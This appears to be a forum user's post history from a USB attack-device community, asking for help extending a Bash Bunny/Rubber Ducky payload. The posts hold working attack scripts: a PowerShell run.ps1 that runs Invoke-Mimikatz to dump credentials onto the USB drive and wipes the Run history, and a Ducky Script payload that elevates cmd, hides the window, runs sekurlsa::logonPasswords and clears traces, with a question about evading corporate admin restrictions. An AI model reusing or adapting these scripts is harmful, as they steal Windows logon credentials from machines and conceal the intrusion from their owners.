Jump to content

bananacake

Members
  • Posts

    3
  • Joined

  • Last visited

Everything posted by bananacake

  1. Thanks for such a quick reply :D Send me your bitcoin address or paypal in a PM for a little donation. I have already been fiddling with the run.ps1 before your post. Unfortunately not had any luck so far. I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1) I have made the following changes to run.ps1: #Remove run history powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" #Get the path and file name that you are using for output # find connected bashbunny drive: $VolumeName = "DUCKY" $computerSystem = Get-CimInstance CIM_ComputerSystem $backupDrive = $null get-wmiobject win32_logicaldisk | % { if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID } } #See if a loot folder exist in usb. If not create one $TARGETDIR = $backupDrive + "\loot" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a info folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\info" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a passwords folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\passwords" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #Create a path that will be used to make the file $datetime = get-date -f yyyy-MM-dd_HH-mm $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" $passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt" #Create output from info script $TARGETDIR = $MyInvocation.MyCommand.Path $TARGETDIR = $TARGETDIR -replace ".......$" cd $TARGETDIR PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath When I run run.ps1 info.ps1 executes correctly as usual, afterwards a new powershell window is opened and a passwords folder is created along with a passwords.txt file. However the passwords.txt file is empty. I'm pretty sure mimikatz is running as my cursor displays a loading timer icon, it's just not outputting the file correctly and I'm not sure exactly what to do to fix this. Any help is appreciated. Thankyou.
  2. Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage. Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example: DELAY 2000 GUI r DELAY 500 STRING powershell Start-Process cmd.exe -verb runAs ENTER DELAY 2000 ALT y DELAY 500 CTRL C REM *** Obfuscate the command prompt *** STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM *** Define Ducky Drive as DUCK *** STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Run Mimikatz from Ducky Drive *** STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING privilege::debug ENTER STRING sekurlsa::logonPasswords full ENTER DELAY 10000 STRING exit ENTER DELAY 5000 REM *** Clear duck variable, history, and GTFO *** STRING set "duck=" ENTER DELAY 100 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER DELAY 100 STRING color 08 ENTER DELAY 100 STRING exit ENTER As you can see this is slower then simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload? Thanks again.
  3. Your old Github links don't work. Mind sharing your new tweaked payload again? Thankyou.
×
×
  • Create New...